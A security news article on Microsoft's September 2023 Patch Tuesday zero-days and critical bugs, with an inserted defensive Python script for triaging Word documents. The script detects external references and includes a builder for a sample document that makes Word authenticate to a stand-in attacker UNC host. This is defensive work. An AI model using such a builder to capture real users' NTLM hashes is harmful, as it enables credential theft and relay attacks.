Microsoft Patches a Pair of Actively Exploited Zero-Days

Published: 23/11/2024   Category: security




Five critical bugs, zero-days exploited in the wild, Exchange Server, and more headline Microsoft's September 2023 Patch Tuesday release. Here's what to patch now.



Microsoft addressed five critical security vulnerabilities in its September Patch Tuesday update, along with two important-rated zero-days under active attack in the wild.
In total, Microsoft released 59 new patches addressing bugs across the product gamut: They affect Microsoft Windows, Exchange Server, Office, .NET and Visual Studio, Azure, Microsoft Dynamics, and Windows Defender.
The update also incorporates a handful of third-party issues, including an actively exploited, critical Chromium zero-day bug that affects Microsoft Edge. With the external issues included, the CVE count totals 65.
Despite the breadth of the fixes, researchers noted that patching prioritization is fairly straightforward this month, with the zero-days, critical bugs, and issues in Microsoft Exchange Server and the Windows implementation of the TCP/IP protocol needing to head to the front of the line for most organizations.
While two of the CVEs are listed as exploited by threat actors in the wild prior to patching, only one is listed as publicly known. Both should be at the top of the patching list, for obvious reasons.
The public bug is found in Microsoft Word (CVE-2023-36761, CVSS 6.2); it's classified as an information disclosure issue, but Dustin Childs, researcher with Trend Micro's Zero Day Initiative (ZDI), noted that this belies its gravity.
"An attacker could use this vulnerability to allow the disclosure of NTLM hashes, which would then presumably be used in an NTLM-relay style attack," he explained in a Tuesday posting on Microsoft's September patch release. "Regardless of the classification, the preview pane is a vector here as well, which means no user interaction is required. Definitely put this one on the top of your test-and-deploy list."
What leaks in this class of bug is a Net-NTLMv2 challenge-response, captured when Word authenticates to a server the attacker controls. Blocking outbound SMB (TCP 445) at the perimeter and requiring SMB and LDAP signing internally limit what can be done with it until the patch is deployed.
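The article does not describe the specific trigger behind CVE-2023-36761, so what follows is an added example (not code from the article, ZDI or Microsoft) of the generic triage check an analyst or mail gateway would run against the wider class of NTLM-leaking documents: it unpacks an OOXML file and lists every relationship or auto-fetching field code that points outside the package to a UNC path or URL, since that is what makes Word authenticate to a remote host. The sample document, the 203.0.113.10 address (an RFC 5737 documentation address) and the function names are constructed for this example, and the check will only catch the patched bug if its trigger happens to be an external reference of this kind.

```python
"""Triage an OOXML document for references that make Word reach out to a
remote host (and so hand over an NTLM challenge-response). Added example,
not from the article; the sample document below is constructed inline."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
# Relationship targets that leave the package: a UNC path or file: URL drives
# SMB (NTLM) authentication; http(s) can do the same via WebDAV or HTTP auth.
EXTERNAL_TARGET = re.compile(r"^(\\\\|//|file:|https?:)", re.IGNORECASE)
# Field codes that fetch content when the document is opened or previewed,
# e.g. { INCLUDEPICTURE "\\203.0.113.10\share\logo.png" \d }
FIELD_CODE = re.compile(
    r"\b(INCLUDEPICTURE|INCLUDETEXT)\s+\"?(\\\\[^\"\s]+|https?://[^\"\s]+)",
    re.IGNORECASE,
)
UNC_HOST = "203.0.113.10"  # documentation address standing in for an attacker host


def scan_docx(data: bytes) -> list[dict]:
    """Return one finding per external relationship or fetching field code."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            content = z.read(name)
            if name.endswith(".rels"):
                root = ET.fromstring(content)
                for rel in root.iter(RELS_NS + "Relationship"):
                    target = rel.get("Target", "")
                    if rel.get("TargetMode") == "External" and EXTERNAL_TARGET.search(target):
                        kind = rel.get("Type", "").rsplit("/", 1)[-1]  # e.g. attachedTemplate
                        findings.append({"part": name, "kind": kind, "target": target})
            elif name.endswith(".xml"):
                # Field codes live in w:instrText runs; a regex over the raw XML is enough here.
                text = content.decode("utf-8", errors="replace")
                for m in FIELD_CODE.finditer(text):
                    findings.append({"part": name, "kind": "field:" + m.group(1).upper(),
                                     "target": m.group(2)})
    return findings


def remote_hosts(findings: list[dict]) -> set[str]:
    """Hosts the document would contact; feed these to egress blocks or IOC lists."""
    hosts = set()
    for f in findings:
        m = (re.match(r"^(?:\\\\|//|file:/*)([^\\/]+)", f["target"])
             or re.match(r"^https?://([^/]+)", f["target"], re.IGNORECASE))
        if m:
            hosts.add(m.group(1).lower())
    return hosts


def build_sample_docx(template_target=None, picture_target=None) -> bytes:
    """Constructed minimal .docx; optionally wires in an external attached
    template (word/_rels/settings.xml.rels) and an INCLUDEPICTURE field."""
    ct = ('<?xml version="1.0" encoding="UTF-8"?>'
          '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
          '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
          '<Default Extension="xml" ContentType="application/xml"/></Types>')
    pkg_rels = ('<?xml version="1.0" encoding="UTF-8"?>'
                '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
                '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/>'
                '</Relationships>')
    field = ""
    if picture_target:
        field = ('<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
                 f'<w:r><w:instrText xml:space="preserve"> INCLUDEPICTURE "{picture_target}" \\d </w:instrText></w:r>'
                 '<w:r><w:fldChar w:fldCharType="end"/></w:r>')
    doc = ('<?xml version="1.0" encoding="UTF-8"?>'
           '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
           f'<w:body><w:p><w:r><w:t>hello</w:t></w:r>{field}</w:p></w:body></w:document>')
    tmpl = ""
    if template_target:
        tmpl = ('<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" '
                f'Target="{template_target}" TargetMode="External"/>')
    settings_rels = ('<?xml version="1.0" encoding="UTF-8"?>'
                     '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
                     f'{tmpl}</Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", ct)
        z.writestr("_rels/.rels", pkg_rels)
        z.writestr("word/document.xml", doc)
        z.writestr("word/settings.xml",
                   '<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        z.writestr("word/_rels/settings.xml.rels", settings_rels)
    return buf.getvalue()


if __name__ == "__main__":
    evil = build_sample_docx(template_target=f"\\\\{UNC_HOST}\\share\\normal.dotx",
                             picture_target=f"\\\\{UNC_HOST}\\share\\logo.png")
    found = scan_docx(evil)
    for f in found:
        print(f"{f['part']}: {f['kind']} -> {f['target']}")
    print("hosts to block:", remote_hosts(found))
```

The attached-template relationship is the classic silent variant: Word resolves it on open without rendering anything the user would notice, and the same rels-scanning logic applies to .dotx, .xlsx and .pptx packages because the relationship format is shared across OOXML.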
The other zero-day exists in the Windows operating system (CVE-2023-36802, CVSS 7.8), specifically in the Microsoft Streaming Service Proxy, a kernel-mode component (not the Microsoft Stream video service, despite the similar name). It is a local elevation-of-privilege bug: an attacker who already has code execution on the machine would run a specially crafted program to gain SYSTEM privileges, according to the advisory.
"It is the eighth elevation of privilege zero-day vulnerability exploited in the wild in 2023," Satnam Narang, senior staff research engineer at Tenable, tells Dark Reading. "Because attackers have a myriad of ways of breaching organizations, simply getting access to a system may not always be enough, which is where elevation of privilege flaws become that much more valuable, especially zero-days."
When it comes to the critical bugs, one of the more concerning is CVE-2023-29332, found in Microsoft's Azure Kubernetes Service (AKS). It could allow a remote, unauthenticated attacker to gain Kubernetes cluster administration privileges.
"This one stands out as it can be reached from the Internet, requires no user interaction, and is listed as low complexity," Childs warned in his post. "Based on the remote, unauthenticated aspect of this bug, this could prove quite tempting for attackers."
Three of the critical-rated patches are RCE problems that affect Visual Studio (CVE-2023-36792, CVE-2023-36793, and CVE-2023-36796, all with a CVSS score of 7.8). Each could lead to arbitrary code execution when a user opens a malicious package file with an affected version of the software; that user-interaction requirement is why the CVSS scores sit below what the critical severity rating might suggest.
"Given Visual Studio's widespread usage among developers, the impact of such vulnerabilities could have a domino effect, spreading harm well beyond the initially compromised system," Tom Bowyer, Automox manager for product security, said in a post. "In the worst-case scenario, this could mean the theft or corruption of proprietary source code, the introduction of backdoors, or malicious tampering that could turn your application into a launchpad for attacks on others."
The final critical issue is CVE-2023-38148 (CVSS 8.8, the most severe that Microsoft patched this month), which allows unauthenticated remote code execution via the Internet Connection Sharing (ICS) function in Windows. Its risk is mitigated by the fact that an attacker would need to be network-adjacent, that is, on the same network segment as the target; further, most organizations no longer use ICS. Those still using it should patch immediately, and those that do not should confirm the Internet Connection Sharing (SharedAccess) service is actually disabled rather than merely unused.
"If attackers successfully exploit this vulnerability, there could be a total loss of confidentiality, integrity, and availability," says Natalie Silva, lead cybersecurity engineer for Immersive Labs. "An unauthorized attacker could exploit this vulnerability by sending a specially crafted network packet to the service. This could lead to the execution of arbitrary code, potentially resulting in unauthorized access, data manipulation, or disruption of services."
Also included in the September update are a set of Microsoft Exchange Server bugs that Microsoft rates as "Exploitation More Likely."
The trio of issues (CVE-2023-36744, CVE-2023-36745, and CVE-2023-36756, all with a CVSS rating of 8.0) affect Exchange Server 2016 and 2019 and are classified by Microsoft as RCE bugs, although the practical impact researchers describe is credential relay rather than code execution on the server.
"While none of these attacks result in RCE on the server itself, it could allow a network-adjacent attacker with valid credentials to alter user data or elicit a Net-NTLMv2 hash for a targeted user account, which in turn could be cracked to recover a user password or relayed internally in the network to attack another service," says Robert Reeves, principal cybersecurity engineer at Immersive.
He adds, "If privileged users — those with Domain Admin or similar permissions within the network — have a mailbox created on Exchange, contrary to Microsoft's security advice, such a relay attack could have significant consequences."
Relay attacks of this kind are blunted by enforcing SMB signing and LDAP signing with channel binding on the services an attacker would relay to, so those settings are worth verifying alongside the patch.
And finally, researchers at Automox flagged a denial-of-service (DoS) vulnerability in Windows TCP/IP (CVE-2023-38149, CVSS 7.5) as one to prioritize.
"The bug affects any networked system, and allows an attacker via a network vector to disrupt the service without any user authentication or high complexity," said Automox CISO Jason Kikta, in a breakdown of Patch Tuesday. "This vulnerability represents a significant threat ... to the digital landscape. These weaknesses can be exploited to overload servers, disrupting the normal functioning of networks and services, and causing them to become unavailable to users."
All of that said, systems with IPv6 disabled are not affected, which makes disabling IPv6 a possible stopgap on hosts that do not need it where the patch cannot be deployed immediately.
